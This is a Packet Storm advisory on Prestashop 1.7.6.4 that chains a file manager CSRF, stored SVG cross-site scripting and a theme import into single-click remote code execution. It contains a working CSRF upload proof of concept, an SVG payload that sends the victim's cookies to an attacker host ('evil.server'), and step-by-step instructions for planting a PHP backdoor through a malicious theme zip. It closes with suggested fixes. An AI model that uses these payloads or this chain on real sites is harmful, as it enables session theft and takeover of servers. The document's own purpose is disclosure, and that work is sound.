exploit the possibilities

Prestashop 1.7.6.4 XSS / CSRF / Remote Code Execution

Prestashop 1.7.6.4 XSS / CSRF / Remote Code Execution
Posted Apr 17, 2020
Authored by Sivanesh Ashok

Prestashop versions 1.7.6.4 and below suffer from code execution, cross site request forgery, and cross site scripting vulnerabilities.

tags | exploit, vulnerability, code execution, xss, csrf
MD5 | e88f3fb2cabe4dd5fc52ac8955ab17bb

Prestashop 1.7.6.4 XSS / CSRF / Remote Code Execution

Change Mirror Download
##########################################################################
# Prestashop <= 1.7.6.4 Multiple Vulnerabilities #
##########################################################################

Author - Sivanesh Ashok | @sivaneshashok <https://twitter.com/sivaneshashok>
| stazot.com

Last Modified: 2020-04-11
Vendor : https://www.prestashop.com/
Version : <= 1.7.6.4
Tested on : 1.7.6.4


--[ Table of Contents

00 - Introduction

01 - Exploit

02 - Cross-Site Request Forgery (CSRF)
02.1 - Exploitation

03 - Stored Cross-Site Scripting
03.1 - Exploitation

04 - Escalation to RCE
04.1 - Exploitation

05 - Solution

06 - Contact



--[ 00 - Introduction

Prestashop is an open source e-commerce solution written in PHP. This
article is about the CSRF and XSS vulnerabilities I discovered and how it
was chained and escalated to single-click RCE, as an unauthenticated
attacker.



--[ 01 - Exploit

I wrote an exploit that chains the vulnerabilities described below to
achieve single-click RCE, as an unauthenticated attacker. It can be found
in the link below.

https://github.com/staz0t/exploits/blob/master/SA20200411_prestashop_csrf_to_rce.html

You would need a Prestashop theme zip file to achieve RCE. A simple theme
can be downloaded from here - https://github.com/PrestaShop/classic-rocket

Download the theme and add a PHP backdoor in the theme zip file. Host it in
a webserver. Now edit the JS variables in the exploit and host it on a
webpage, send the link to the admin. Once the admin visits the webpage, the
PHP file will be uploaded and can be visited in the link below

http://target.server/themes/{theme-name}/{php-file-name}.php



--[ 02 - Cross-Site Request Forgery (CSRF)

An unauthenticated attacker can exploit this vulnerability to trick an
authenticated user with 'Products Edit' permission to upload files to the
'File Manager'. This application does not check for a CSRF token in the
File Manager's upload endpoint, {adminurl}/filemanager/upload.php, which
causes this issue.


--[ 02.1 - Exploitation

To exploit this vulnerability, an attacker should craft a CSRF webpage, and
trick an authenticated user with 'Products Edit' permission to visit the
webpage.

1. Create a webpage that automatically submits a POST upload request to the
file manager.

For example,

----[ code segment ]----

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST",
"http:\/\/prestashop.localhost-windows.com\/admin501to49xz\/filemanager\/upload.php",
true);
xhr.setRequestHeader("Content-Type", "multipart\/form-data;
boundary=---------------------------6487332036660663652470259777");
xhr.withCredentials = true;
var body =
"-----------------------------6487332036660663652470259777\r\n" +
"Content-Disposition: form-data; name=\"path\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------6487332036660663652470259777\r\n" +
"Content-Disposition: form-data; name=\"path_thumb\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------6487332036660663652470259777\r\n" +
"Content-Disposition: form-data; name=\"file\";
filename=\"csrfpoc.svg\"\r\n" +
"Content-Type: image/svg+xml\r\n" +
"\r\n" +
"\x3csvg xmlns=\"http://www.w3.org/2000/svg\" /\x3e\r\n" +
"\r\n" +
"-----------------------------6487332036660663652470259777--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
</script>
</body>
</html>

----[ code segment ]----

2. Send the link of the webpage to the victim.

The above code segment uploads csrfpoc.svg when the victim user visits the
webpage that hosts this code.



--[ 03 - Stored Cross-Site Scripting

An attacker can exploit this vulnerability to execute javascript code in
the context of the victim. The vulnerability is in the 'File Manager'.
Backed users with 'Products Edit' permission can upload files, with
whitelisted extension.

By default, the following extensions are allowed to be uploaded in the File
Manager.

jpg, jpeg, png, gif, bmp, tiff, svg, pdf, mov, mpeg, mp4, avi, mpg, wma,
flv, webm

As mentioned, SVG files are allowed and SVG files can contain javascript
code in them. This allows a backend user with 'Products Edit' permission to
run arbitrary javascript code in the context of a victim.


--[ 03.1 - Exploitation

An unauthenticated attacker can chain the previously explained CSRF with
this vulnerability to trick an authenticated user with 'Products Edit'
permission to upload an SVG file with malicious javascript code.

1. Create an SVG file with javascript payload in it.
For example,
<svg xmlns="http://www.w3.org/2000/svg" onload="document.location='
http://evil.server/?c='+document.cookie;" />
This payload sends the victim's cookies to attacker's server

2. Create a webpage that automatically submits a POST upload request, with
the contents of the malicious SVG file.

3. Host the webpage and send the link to the victim with 'Products Edit'
permission.

4. When the victim opens the URL, the SVG file with the javascript payload
gets uploaded to http://target.server/img/cms/evil.svg

5. Send the SVG link to the target victim. When the victim opens the link,
the cookies of the victim gets sent to the attacker.



--[ 04 - Escalation to Remote Code Execution

By targeting the admin, an attacker can gain RCE in the server. This is
achieved by using the 'Import Theme' functionality.


--[ 04.1 - Exploitation

Theme import functionality can fetch a ZIP file and unpack it to themes/
directory, provided that the ZIP has all the necessary theme files. The ZIP
file could contain a PHP file, and the server will still unzip it to
themes/{theme-name} directory.

An attacker can exploit this feature to upload a theme with a malicious PHP
file to achieve RCE, by using the previously explained CSRF and XSS bug
chain.

1. Create an SVG file with javascript payload that does the following.

1.1. Opens the 'Import Theme' page and fetches the CSRF token
1.2. Send a POST request to the theme upload endpoint with the link to
the malicious ZIP file

2. Create a webpage that exploits the CSRF to automatically submit a POST
upload request to the file manager's upload endpoint to upload the
malicious SVG file.

3. Send the webpage's link to an authenticated user with 'Products Edit'
permission (or the admin). This uploads the SVG file to the server.
http://target.server/img/cms/exploit.svg

4. Now send the uploaded SVG file's link to the admin. When the admin opens
the link, the theme with the PHP file gets imported. It can be opened with
the following link.
http://target.server/themes/{theme-name}/backdoor.php


Putting all this together, an unauthenticated attacker can achieve
single-click RCE by targeting the admin (SuperUser) of the server.



--[ 05 - Solution

1. Implement CSRF protection in {adminurl}/filemanager/upload.php endpoint.

2. Disallow SVG upload in File Manager or validate the SVG file's contents
before uploading.

3. Consider implementing a validation process to check for PHP files before
importing the theme ZIP file.



--[ 06 - Contact

Name : Sivanesh Ashok

Twitter: @sivaneshashok <https://twitter.com/sivaneshashok>

Website: https://stazot.com

Login or Register to add favorites

File Archive:

August 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    3 Files
  • 2
    Aug 2nd
    2 Files
  • 3
    Aug 3rd
    32 Files
  • 4
    Aug 4th
    22 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    6 Files
  • 8
    Aug 8th
    1 Files
  • 9
    Aug 9th
    2 Files
  • 10
    Aug 10th
    27 Files
  • 11
    Aug 11th
    11 Files
  • 12
    Aug 12th
    11 Files
  • 13
    Aug 13th
    17 Files
  • 14
    Aug 14th
    7 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close